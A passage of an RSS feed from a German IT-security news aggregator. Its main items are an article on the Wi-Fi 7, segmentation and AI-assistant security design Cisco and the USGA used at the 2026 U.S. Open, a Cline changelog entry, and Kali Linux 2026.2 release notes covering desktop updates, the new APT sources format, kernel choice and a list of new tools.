<link>https://tsecurity.de/de/3634603/it-security-nachrichten/kartellbildung-klage-gegen-dram-hersteller-wegen-speicherpreisen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634603/it-security-nachrichten/kartellbildung-klage-gegen-dram-hersteller-wegen-speicherpreisen-golemde/</guid>
<pubDate>Tue, 30 Jun 2026 07:19:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seminar: <b>IT</b>-<b>Sicherheit</b> für Webentwickler: virtueller Zwei-Tage-Workshop · E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Polizei und Palantir: Wie Bayern die Kontrolle über Palantir verliert - Golem.de]]></title>
<description><![CDATA[Microsoft 365 Security: virtueller Drei-Tage-Workshop. Seminar ... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></description>
<link>https://tsecurity.de/de/3634598/it-security-nachrichten/polizei-und-palantir-wie-bayern-die-kontrolle-ueber-palantir-verliert-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634598/it-security-nachrichten/polizei-und-palantir-wie-bayern-die-kontrolle-ueber-palantir-verliert-golemde/</guid>
<pubDate>Tue, 30 Jun 2026 07:19:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft 365 <b>Security</b>: virtueller Drei-Tage-Workshop. Seminar ... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. Open powers up AI-ready network in challenging environment]]></title>
<description><![CDATA[Cisco’s work with the USGA at the 2026 U.S. Open at Shinnecock Hills Golf Club was a live testbed for what AI-ready networking and security look like in the wild — not in a lab, not in a climate-controlled data center, but across 18 holes of constantly changing terrain, crowds, and threats. It’s ...]]></description>
<link>https://tsecurity.de/de/3634437/it-security-nachrichten/us-open-powers-up-ai-ready-network-in-challenging-environment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634437/it-security-nachrichten/us-open-powers-up-ai-ready-network-in-challenging-environment/</guid>
<pubDate>Tue, 30 Jun 2026 05:19:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Cisco’s work with the <a href="https://www.usga.org/">USGA</a> at the 2026 U.S. Open at <a href="https://www.shinnecockhillsgolfclub.org/">Shinnecock Hills Golf Club</a> was a live testbed for what AI-ready networking and security look like in the wild — not in a lab, not in a climate-controlled data center, but across 18 holes of constantly changing terrain, crowds, and threats. It’s also a blueprint that network engineers in other industries can borrow as they grapple with the convergence of connectivity, security, and AI apps.</p>



<h2 class="wp-block-heading">Golf as a worst‑case network environment</h2>



<p>From a distance, it’s tempting to lump golf in with stadium or arena networking. The reality on the ground is very different. Stadiums offer a fixed concrete bowl and predictable RF patterns. A <a href="https://www.usopen.com/">U.S. Open</a> venue is effectively rebuilt every year: temporary structures, new hospitality layouts, shifting fiber routes, and a crowd that never sits still.</p>



<p>Christian Rodriguez, senior manager, IT operations, from the USGA’s technology team, captured that reality when he explained why they tear down and rebuild from scratch: No two championships share the same layout, ISP entry points, or even the placement of critical compounds. They don’t simply clone last year’s configs; they design for the specific course, topology, and constraints of that site. That level of contextual design is expensive, but it’s also the only way to avoid brittle architectures that fall apart as soon as the environment changes.</p>



<p>Environmental conditions add another layer of complexity. Anthony Santora, managing director of IT for the USGA, describes the championship network as a data center without the usual comforts. There’s dust, rain, wind, and wide temperature swings instead of clean, controlled air. Hardware resides in trailers and weatherproof enclosures, not in racks behind raised floor tiles. For network engineers who spend most of their time on office campuses and in colos, that’s an important reminder: Critical infrastructure increasingly sits in places that look nothing like a traditional wiring closet.</p>



<p>User behavior is just as hostile. The U.S. Open has its own term — the “Tiger effect” (though one could argue it’s now the Scottie effect) — for what happens when tens of thousands of fans follow a single golfer. The hot spot moves with the group, and the RF design must cope with a dense, moving cluster of devices. That pattern should sound familiar to anyone who supports large conferences or festivals; it’s the same phenomenon, just under a different name.</p>



<h2 class="wp-block-heading">Building an AI‑ready, fault‑tolerant course network</h2>



<p>Cisco’s answer to this environment is a fully redundant, mobile core design. Instead of a single large core in a building, the network collapses into dual trailers that serve as cores on the go, typically anchored at the NBC broadcast compound and another central location. Each core hosts Cisco Secure Firewall appliances, FMCs, core Catalyst switches, DHCP, UPS, and generators, all in pairs. Rodriguez was matter-of-fact about the philosophy: “We do everything in pairs as much as we can.” If one fails, its twin picks up the load.</p>



<p>From those cores, the team builds a ring topology around the course, using diverse fiber paths — including trenching fiber through wooded areas — to avoid single points of failure. Mobile IDF kits in cooled cabinets serve as distribution points, delivering connectivity to weatherproof access switches and Wi-Fi access points around hospitality tents, grandstands, and entry gates. Everything on the backbone operates at Layer 3, with HSRP (Hot Standby Routing Protocol) and routing redundancy to ensure that a single switch failure doesn’t take out large swaths of the network.</p>



<p>The scale of a golf course deployment is massive as well, with about 500 access points and more than 100 switches, many of them the latest <a href="https://www.networkworld.com/article/4135351/favorable-wi-fi-7-prices-wont-be-around-for-long-delloro-group-warns.html">Wi‑Fi 7</a> and campus platforms. What matters is not the absolute numbers but the duty cycle. Every TV, every POS terminal, every credential pedestal, every media workstation, and every fan device share this converged fabric during a compressed, high‑risk period. Santora points out the business impact in simple terms: If merchandise goes down for even five minutes, lines explode and fans walk away. There’s no “we’ll patch it on the next maintenance window.”</p>



<p>On the RF side, the <a href="https://www.networkworld.com/article/4092389/singapore-makes-the-leap-to-wi-fi-7-to-boost-fan-experience.html">shift to Wi‑Fi 7</a> is more than a speed upgrade. Santora’s team has seen real-world performance improvements — hundreds of megabits down in the middle of a packed media center – but the more important change is resilience under high density. When you combine wider channels, better scheduling, and smarter management with a dense deployment, you get something that can withstand the Tiger Effect and the crush of content creators and broadcasters.</p>



<p>That last group is critical. Rob Neumann from Cisco notes that at these events, upload traffic now dominates download traffic. Influencers, media teams, and fans are publishing in near-real time, and cellular uplink simply can’t keep up. High-capacity Wi-Fi with solid backhaul isn’t a luxury; it’s the only way to avoid a miserable experience for the most vocal, visible part of the audience.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="894" height="1024" sizes="auto, (max-width: 894px) 100vw, 894px"&gt;</figure><p class="imageCredit">Zeus Kerravala</p></div>



<h2 class="wp-block-heading">Security: Treat every device as untrusted</h2>



<p>If the connectivity story feels familiar, the security posture at the U.S. Open is where this deployment begins to diverge from more generic “converged stadium” narratives. Santora has to contend with “thousands of untrusted devices” each championship week: fans, vendors, media, broadcasters, and staff, many of whom plug in or connect to networks the USGA doesn’t control outside the event. The USGA is well aware of the risks: outages or breaches could lead to data and financial losses, as well as reputational damage that would undermine the organization’s core mission, not just its IT metrics.</p>



<p>Cisco Secure Firewall, AnyConnect, Duo, and other components form the core security stack, but how they’re used is the differentiator. Fan Wi‑Fi runs with strict isolation: every client is segmented, so lateral movement is essentially off the table. Neumann explains it simply — each fan has an isolated path out — but under the covers, you get VLAN separation, policy enforcement, and inspection that treat fan traffic as untrusted end-to-end.</p>



<p>The rest of the network is equally segmented. There’s a separate network for <a href="https://www.pgatour.com/shotlink">ShotLink</a> and everything “inside the ropes,” including scoring and betting feeds. Back-of-house traffic for staff, concessions, and retail runs on its own network. Remote POS systems are segmented again. Broadcast compounds and production systems have their own paths and policies. The result is a unified, converged physical fabric with tightly controlled logical overlays.</p>



<p>This is a pattern many enterprises discuss but struggle to implement: a single platform that carries many classes of traffic, each with its own risk profile, without collapsing into a flat, lateral-friendly network. The U.S. Open shows that it’s possible — but only if segmentation is treated as a core design principle, not an afterthought.</p>



<h2 class="wp-block-heading">Observability and AI security in the loop</h2>



<p>Security and availability at this scale demand observability. Here again, Santora’s team is in the middle of a transition many enterprises are grappling with: moving from reactive log-scraping to proactive, correlated telemetry.</p>



<p>Instead of manually combing through firewall and switch logs, the USGA and Cisco have built a pipeline into Splunk and Cisco’s observability tools. Neumann describes it as a single pane of glass across the network, but the more important point is what feeds that view: APs, switches, firewalls, cameras, and applications, all instrumented and reporting. When you combine that with full-stack observability, you can spot anomalies in real time, whether they’re performance issues or indicators of compromise.</p>



<p>That observability story extends to AI. One of the headline features of the renewed Cisco–USGA partnership is the AI-powered rules assistant: an application that lets golfers and fans ask complex rules questions in the USGA app and receive near-instant guidance. Under the hood, Santora’s team started with question–answer pairs and built a knowledge graph that now spans hundreds of topics and clusters. They also built an evaluation program that identifies outliers — questions the system struggles with — and feeds them back into human review.</p>



<p>Cisco AI Defense wraps the assistant with security controls. It’s not enough to get rules right; the system must resist prompt injection, data exfiltration, and other AI-specific threats that are increasingly appearing in the wild. The teams monitor usage, validate models, and protect applications at runtime against misuse or abuse. Perhaps most importantly, they keep a human override in place. If the system isn’t confident, it won’t answer; it escalates to rules experts rather than bluffing.</p>



<p>This is a model network engineers should watch as AI assistants and agents proliferate across other industries. The U.S. Open rules assistant isn’t treated as a toy or a sidecar; it’s a mission-critical application that resides within the same protected fabric as POS, scoring, and broadcast and is subject to the same observability and security rigor.</p>



<h2 class="wp-block-heading">Lessons for network engineers beyond golf</h2>



<p>Strip away the golf-specific details, and a set of lessons emerges:</p>



<ul class="wp-block-list">
<li><strong>Design for tough, not ease.</strong> Assume transient structures, unknown RF patterns, seasonal layout changes, and harsh environmental conditions. The U.S. Open team rebuilds from scratch for each venue; most enterprises don’t need to go that far, but they should at least validate designs against real-world changes rather than assuming a static topology.</li>



<li><strong>Make redundancy systemic.</strong> Dual cores, dual firewalls, ring topologies, HSRP, Layer 3 everywhere, spare hardware on site, and live failover drills are all part of the fabric. Redundancy isn’t a checkbox on a data sheet; it’s an operational discipline.</li>



<li><strong>Treat every device as untrusted.</strong> Fan devices, vendor systems, broadcast laptops, and staff phones all arrive with unknown posture. Segmentation — per-client isolation, dedicated networks for sensitive functions, and strong identity — is the only sustainable way to cope with that diversity.</li>



<li><strong>Upload is the new download.</strong> Traditional designs optimized for download traffic are increasingly misaligned with reality. Conferences, stadiums, and campuses now behave like the U.S. Open: content creators and collaborative apps push far more data than they pull. Wi-Fi 7 and modern campus platforms help, but you still need to design RF and backhaul with upload and lateral traffic in mind.</li>



<li><strong>Integrate observability and AI security from day one.</strong> Logs alone aren’t enough. Coherent telemetry, full-stack observability, and AI-focused security controls should be treated as first-class requirements, especially as AI assistants move into business-critical workflows.</li>
</ul>



<h2 class="wp-block-heading">Final thoughts</h2>



<p>Perhaps the most important takeaway is cultural rather than technical. Santora and his team position AI and automation as tools for scale, not as replacements for experts. The rules assistant accelerates responses and expands reach, but it still defers to human judgment when confidence is low. The network uses automation and observability to keep a complex environment running, but it still depends on experienced engineers, in trailers on-site, watching for issues and making decisions.</p>



<p>For network engineers in other industries, that’s a useful template: Build AI-ready, secure, observable networks that assume the worst about their environment, and pair them with human expertise that can adapt when reality inevitably diverges from the design.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="673" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;</figure><p class="imageCredit">Zeus Kerravala</p></div>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rocket Lab: Weltraumkonzern kauft Satellitentelefonnetzwerk Iridium für 8 Milliarden Dollar]]></title>
<description><![CDATA[Seminar: Intensivseminar KI-Management · E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · Seminar: IT-Security- ...]]></description>
<link>https://tsecurity.de/de/3634362/it-security-nachrichten/rocket-lab-weltraumkonzern-kauft-satellitentelefonnetzwerk-iridium-fuer-8-milliarden-dollar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634362/it-security-nachrichten/rocket-lab-weltraumkonzern-kauft-satellitentelefonnetzwerk-iridium-fuer-8-milliarden-dollar/</guid>
<pubDate>Tue, 30 Jun 2026 04:07:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seminar: Intensivseminar KI-Management · E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · Seminar: <b>IT</b>-<b>Security</b>- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.0.4]]></title>
<description><![CDATA[Changed

Fully remove the ClinePass feature flag so ClinePass is available everywhere in the UI — onboarding, settings, the welcome promo banner, and the credit-limit "Switch to ClinePass" action.

Full Changelog: v4.0.3...v4.0.4]]></description>
<link>https://tsecurity.de/de/3634002/downloads/v404/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634002/downloads/v404/</guid>
<pubDate>Mon, 29 Jun 2026 22:46:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Changed</h3>
<ul>
<li>Fully remove the ClinePass feature flag so ClinePass is available everywhere in the UI — onboarding, settings, the welcome promo banner, and the credit-limit "Switch to ClinePass" action.</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/v4.0.3...v4.0.4"><tt>v4.0.3...v4.0.4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: Kali Linux 2026.2]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The Kali Linux project has released a new snapshot of the security- and forensics-focused distribution. The project's 2026.2 release includes several upgrades: "It’s the final week of Q2, and Kali Linux 2026.2 is here - right on sc...]]></description>
<link>https://tsecurity.de/de/3633572/unix-server/distribution-release-kali-linux-20262/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633572/unix-server/distribution-release-kali-linux-20262/</guid>
<pubDate>Mon, 29 Jun 2026 19:01:10 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The Kali Linux project has released a new snapshot of the security- and forensics-focused distribution. The project's 2026.2 release includes several upgrades: "It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule. We have been heads down since our last release, and....]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Release (GNOME 50, KDE 6.6, Helper Scripts, APT Formats & VM Boot Tweaking)]]></title>
<description><![CDATA[It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule ;) We have been heads down since our last release, and we are ready to share what we have been working on. This release is a mix of desktop refreshes, infrastructure improvements, and quality-of-life changes that we thin...]]></description>
<link>https://tsecurity.de/de/3633508/tools/kali-linux-20262-release-gnome-50-kde-66-helper-scripts-apt-formats-vm-boot-tweaking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633508/tools/kali-linux-20262-release-gnome-50-kde-66-helper-scripts-apt-formats-vm-boot-tweaking/</guid>
<pubDate>Mon, 29 Jun 2026 18:25:00 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule ;) We have been heads down since our last release, and we are ready to share what we have been working on. This release is a mix of desktop refreshes, infrastructure improvements, and quality-of-life changes that we think you will appreciate.</p>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2026-1-release/">2026.1 release from March</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#desktop-environments-updates">Desktop Environments</a></strong> - Bump to GNOME 50 and KDE Plasma 6.6</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#improved-consistency-for-services-helper-scripts">Helper Scripts Consistency</a></strong> - Consistency to our little launches at starting services</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#apt-gets-a-new-sources-format">APT Format</a></strong> - Goodbye <code>sources.list</code>, hello <code>sources.list.d/kali.source</code></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#no-more-graphics-firmware-pre-installed-for-vm-use-cases">VM Boot Optimisation</a></strong> - Smaller initrd + faster boot times = happy virtual machine users</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#disruptive-package-updates">Reboot Warning</a></strong> - Heads-up, <code>polkit</code> and <code>xrdp</code> upgrades require a system reboot</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#linux-kernel-for-this-release-619">Kali Kernel Incoming</a></strong> - Staying with 6.19 for now, how to get 7.0 early</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#a-sneak-peek-build-scripts">Build Scripts Incoming</a></strong> - Heads-up with some changing on the way</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny packages have been added <em>(9!)</em></li>
</ul>
<hr>
<h2>Desktop Environments Updates</h2>
<p>As we do roughly every six months, every other Kali release, our <a href="https://www.kali.org/docs/general-use/switching-desktop-environments/">desktop environments</a> get a major update. This time it’s for: <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#gnome-50">GNOME</a> and <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#kde-plasma-6-6">KDE Plasma</a>. Neither brings sweeping changes, but both have put real effort into <strong>refining performance and usability</strong> across the whole ecosystem.</p>
<h3>GNOME 50</h3>
<p>GNOME 50 brings usability and performance improvements across the desktop. The <strong>file manager received significant optimizations</strong>, resulting in faster thumbnail and icon loading, improved responsiveness, and reduced memory usage. The desktop also received new accessibility enhancements through a brand-new preferences window, tweaks to the screen reader, and automatic language switching.</p>
<p>Another addition is <strong>support for document annotations</strong> in the Document Viewer app, making it easier to add text notes and highlights directly to documents.</p>
<p>Here you can read more about all the changes with this new GNOME release: <a href="https://release.gnome.org/50/">GNOME 50 release announcement</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/gnome-50.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/gnome-50.png" alt="Kali + GNOME 50">
</a>
</p>

<h3>KDE Plasma 6.6</h3>
<p>KDE Plasma 6.6 focuses on improving usability and accessibility while introducing several new features, including a <strong>new on-screen keyboard</strong>, providing a better experience particularly for touch-enabled devices.</p>
<p>The <strong>Spectacle screenshot utility can now recognize and extract text</strong> directly from screenshots, making OCR functionality available from the desktop. Accessibility has also been enhanced with new color-vision support options, improvements to Zoom and Magnifier, support for Slow Keys on Wayland, and adoption of the standardized Reduced Motion setting.</p>
<p>Here you can read more about all the changes with this new Plasma release: <a href="https://kde.org/announcements/plasma/6/6.6.0/">KDE Plasma 6.6 release announcement</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/kde-6.6.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/kde-6.6.png" alt="Kali + KDE Plasma 6.6">
</a>
</p>

<h2>Improved Consistency For Services Helper Scripts</h2>
<p>To improve consistency across tools that depend on a service, we have updated our helper scripts. Previously, a tool that required a service might only let you start it (with no way to stop) - and the information displayed back was inconsistent (mixture of service status, how to access, default credentials or nothing at all). With this change, multiple packages have been updated to use these new scripts, which now handle the following tasks:</p>
<ul>
<li>Manage the service - <strong>start/stop</strong></li>
<li><strong>Check if the service is already running</strong> - avoiding starting it twice</li>
<li>Show the <strong>service status</strong></li>
<li>Show any <strong><a href="https://www.kali.org/docs/introduction/default-credentials/">default credentials</a></strong></li>
<li>Show <strong>how to access it</strong> - such as if it’s a web UI, the URL <em>(and bonus, <strong>automatically open it in the browser</strong>!)</em></li>
</ul>
<p>We also make sure that any Kali packages which include a service use <strong><code>&lt;tool&gt;-start</code></strong>/<strong><code>&lt;tool&gt;-stop</code></strong> for their command names.</p>
<p><em>Hopefully this makes the little things a little easier.</em></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/kali-services.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/kali-services.png" alt="Kali Services Helper Scripts">
</a>
</p>

<h2>APT Gets A New Sources Format</h2>
<p>Since the beginning of time, the APT sources for Kali Linux were configured in the file <code>/etc/apt/sources.list</code>. This file tells APT from where to update your system, and it’s so fundamental that pretty much everyone (that is, Kali users) knows this file and its content:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware
</code></pre>
<p>Well, it’s a <strong>“once in a distro lifetime” kind of thing, and here it is</strong> - <code>/etc/apt/sources.list</code> is retired, in favor of the new file <code>/etc/apt/sources.list.d/kali.sources</code>:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list.d/kali.sources
# See https://www.kali.org/docs/general-use/kali-apt-sources/
Types: deb
URIs: http://http.kali.org/kali/
Suites: kali-rolling
Components: main contrib non-free non-free-firmware
Signed-By: /usr/share/keyrings/kali-archive-keyring.gpg
</code></pre>
<p><strong>All the freshly-installed systems will be configured</strong> as such. <strong>Existing systems won’t be changed</strong>. Both files are equivalent and work just the same. However, in the near future, APT will warn if the old file is in use, and will suggest modernizing it.</p>
<p>Note that, for those in the know, this isn’t anything new: both formats have existed for a long time now, and you could use either one or the other. What’s happening is that the <em>default</em> is slowly changing, from the <strong>old “one-line-style”</strong> to the <strong>new “deb822-style”</strong>. This is happening in Debian and in Debian-derivatives like Ubuntu. Kali is just following suit.</p>
<p>And for the curious, there’s a very complete and detailed manual page:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ man sources.list
</code></pre>
<h2>No More Graphics Firmware Pre-installed For VM Use-cases</h2>
<p>Kali has had a long tradition of pre-installing a lot of firmware in its images. The upside is that users didn’t need to know what firmware they needed to install for their hardware to work: it was already there. And the downside, obviously, was that all the firmware that wasn’t needed was nevertheless installed and taking space for nothing. </p>
<p>It worked for us so far, in the sense that we don’t get too many bug reports related to missing firmware. But lately the changing landscape of <em>graphics firmware</em> forced us to re-evaluate this decision.</p>
<p>The issue with graphics firmware is that it just keeps growing bigger, and right now having it installed for <a href="https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/">NVidia</a>, AMD and Intel GPUs takes almost 300 MB. But what’s even worse: some bits and pieces of these firmware packages need to be loaded very early, and therefore they are also installed in the initrd (note: the initrd, or initramfs, is this “minimal” system that is loaded early on by the kernel at boot time). And lately, the Kali initrd peaked at around 200 MB, mainly due to graphics firmware. What does that mean in practice? A bigger initrd means slower boot time, and can potentially fill up your <code>/boot</code> partition if ever it’s too small.</p>
<p>So we thought we could improve the situation for VM users here: the vast majority probably don’t need graphics firmware, ever. The only use-case we can think of is a VM with a dedicated GPU + GPU passthrough enabled. If you’re in this case, you might need graphics firmware.</p>
<p>So, what changed in practice, you may ask?</p>
<ul>
<li><strong><a href="https://www.kali.org/get-kali/#kali-virtual-machines">Pre-built VM images</a> don’t come with graphics firmware anymore</strong></li>
<li><a href="https://www.kali.org/get-kali/#kali-installer-images"><strong>Installer images</strong></a> now detect if installation happens <strong>in a VM</strong>, and in that case <strong>graphics firmware is not installed</strong></li>
</ul>
<p>As a result, the <strong>initrd is down to 60 MB for VM users, and the boot time is cut by ~3x</strong> (tested for QEMU VM on a Linux host, your mileage may vary). That’s a massive improvement in boot time.</p>
<p>For baremetal users: nothing changed, so you still get a 200 MB initrd with all graphics firmware pre-installed. If you’d like to optimize, it’s on you to uninstall the firmware that you don’t need. A word of caution though: make sure to know what you’re doing, because removing graphics firmware that is <em>needed</em> might leave you with a <a href="https://www.kali.org/docs/troubleshooting/graphics-issues-on-bare-metal-installation/">system without graphics after reboot</a>.</p>
<h2>Disruptive Package Updates</h2>
<p>We’ve got some slightly disruptive updates in this release.</p>
<p><strong>polkit: a reboot is required</strong></p>
<p>The update of the <code>polkitd</code> package requires a reboot, otherwise <em>trying to start GUI applications as root will fail with cryptic error messages</em>.</p>
<p>There’s an indication of this <strong>reboot requirement</strong> in the output of <code>apt full-upgrade</code>, when the <code>polkitd</code> package is updated. It’s just <strong>not very obvious</strong>, the hint is buried with the rest of the logs:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt full-upgrade
[...]
Setting up libpolkit-gobject-1-0:amd64 (127+really127-0kali1)…
Setting up libpolkit-agent-1-0:amd64 (127+really127-0kali1)…
Setting up polkitd (127+really127-0kali1)…
Upgrading to this polkitd version requires a reboot, please reboot the system when convenient.
Created symlink '/etc/systemd/system/sockets.target.wants/polkit-agent-helper.socket' → '/usr/lib/systemd/system/polkit-agent-helper.socket'.
[...]
</code></pre>
<p>After a reboot, and if ever you still can’t run applications as root, make sure that <code>polkit-agent-helper</code> is started:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo systemctl enable --now polkit-agent-helper.socket
</code></pre>
<p>If you’re still having issues, reach out on our <a href="https://bugs.kali.org/">bug tracker</a>.</p>
<hr>
<p><strong>xrdp: a reboot is required</strong></p>
<p>In this Kali release, we updated <code>xrdp</code> and <code>xorgxrdp</code> to the <code>v0.10</code> series. <a href="https://www.kali.org/docs/general-use/xfce-with-rdp/">xrdp</a> is an open-source Remote Desktop Protocol server: you might use it if you connect to your Kali instance remotely. <em>If you’re an xrdp user, you’ll need to reboot after this upgrade</em>.</p>
<p>For those who run Kali in Hyper-V, using the <a href="https://www.kali.org/docs/virtualization/install-hyper-v-guest-enhanced-session-mode/">Enhanced Session Mode</a>: you’re an xrdp user, even if you didn’t know it! We did our best to ensure a smooth transition, and yet we got reports that xrdp wasn’t functional after the upgrade. If ever you’re in this case, you can try to run <code>kali-tweaks</code>, and in the Virtualization section you can try to <strong>disable, and then enable again</strong> the Hyper-V Enhanced Session Mode. That might fix the issue. <strong>Don’t forget to reboot</strong>!</p>
<p>As always, if you’re still having issues after that, feel free to reach out on the <a href="https://bugs.kali.org/">Kali bug tracker</a>.</p>
<h2>Linux Kernel For This Release: 6.19</h2>
<p>Regarding the version of the <a href="https://pkg.kali.org/pkg/linux">Linux kernel</a> to include in this release of Kali, it’s been a tough decision.</p>
<p>On one hand, we’d like to release with the latest version of the Linux kernel, due to all the recent vulnerability disclosures (<a href="https://en.wikipedia.org/wiki/Copy_Fail">Copy Fail/CVE-2026-31431</a>, <a href="https://github.com/V4bel/dirtyfrag">Dirty Frag/CVE-2026-43284 &amp; CVE-2026-43500</a> and others ). On the other hand, when the 7.0 kernel reached Debian, there were <a href="https://bugs.debian.org/1135362">reports of incompatibilities with the NVidia DKMS drivers</a> .</p>
<p>We decided to release with a 6.19 kernel to avoid breaking <a href="https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/">NVidia users</a>. At the same time, for <strong>those who prefer to get the latest kernel</strong> and don’t care about NVidia compatibility, <strong>we have the kernel 7.0 ready for you in <code>kali-experimental</code></strong>. Make sure to check our documentation that explains <a href="https://www.kali.org/docs/general-use/kali-apt-sources/#enabling-kali-additional-branches">how to enable the kali-experimental repository</a>. The 7.0 kernel is also available in kali-rolling, so you can just <a href="https://www.kali.org/docs/general-use/updating-kali/">update your whole system</a> and get the latest packages from <a href="https://www.kali.org/docs/general-use/kali-branches/">kali-rolling</a>.</p>
<h2>A Sneak Peek: Build Scripts</h2>
<p>Our <a href="https://gitlab.com/kalilinux/build-scripts/">build scripts</a> are what we use to produce every Kali image - ARM SBCs, Base (Installer and live ISOs), Cloud, Containers, VMs, WSL &amp; NetHunter/Pro. Each lives in its own repo, and over time they have each grown in slightly different directions. For the next release, Kali 2026.3, we are doing <strong>a consistency pass across all of them: same structure, same conventions, same behaviour throughout</strong>.</p>
<p>As a result of these changes, some CI pipelines or workflows may need tweaking.</p>
<h2>New Tools in Kali</h2>
<p>This release brings <strong>9 new tools</strong> <em>(to the network repositories)</em>. As always, we have been busy adding to the arsenal:</p>
<ul>
<li><a href="https://www.kali.org/tools/arsenal-ng/">arsenal-ng</a> - Go-based command library equipped with 200+ cybersecurity cheat-sheets</li>
<li><a href="https://www.kali.org/tools/hydra/">hydra-gtk</a> - [Re-added] Very fast network logon cracker - GTK+ based GUI</li>
<li><a href="https://www.kali.org/tools/legba/">legba</a> - Multiprotocol credentials bruteforcer / password sprayer and enumerator</li>
<li><a href="https://www.kali.org/tools/oletools/">oletools</a> - Analyze MS OLE2 files and MS Office documents</li>
<li><a href="https://www.kali.org/tools/penelope/">penelope</a> - Powerful shell handler</li>
<li><a href="https://www.kali.org/tools/shell-gpt/">shell-gpt</a> - Command-line productivity tool powered by AI large language models</li>
<li><a href="https://www.kali.org/tools/tailscale/">tailscale</a> - Secure connectivity platform</li>
<li><a href="https://www.kali.org/tools/tookie-osint/">tookie-osint</a> - OSINT information gathering tool for finding social media accounts</li>
<li><a href="https://www.kali.org/tools/uro/">uro</a> - Declutter URLs for crawling/pentesting</li>
</ul>
<p><em>There has also been numerous packages updates and new libraries as well. We also bump the <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#linux-kernel-for-this-release-619">Kali kernel to 6.19</a>.</em></p>
<h2>Kali NetHunter Updates</h2>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-eviltwin.jpg" target="_blank">
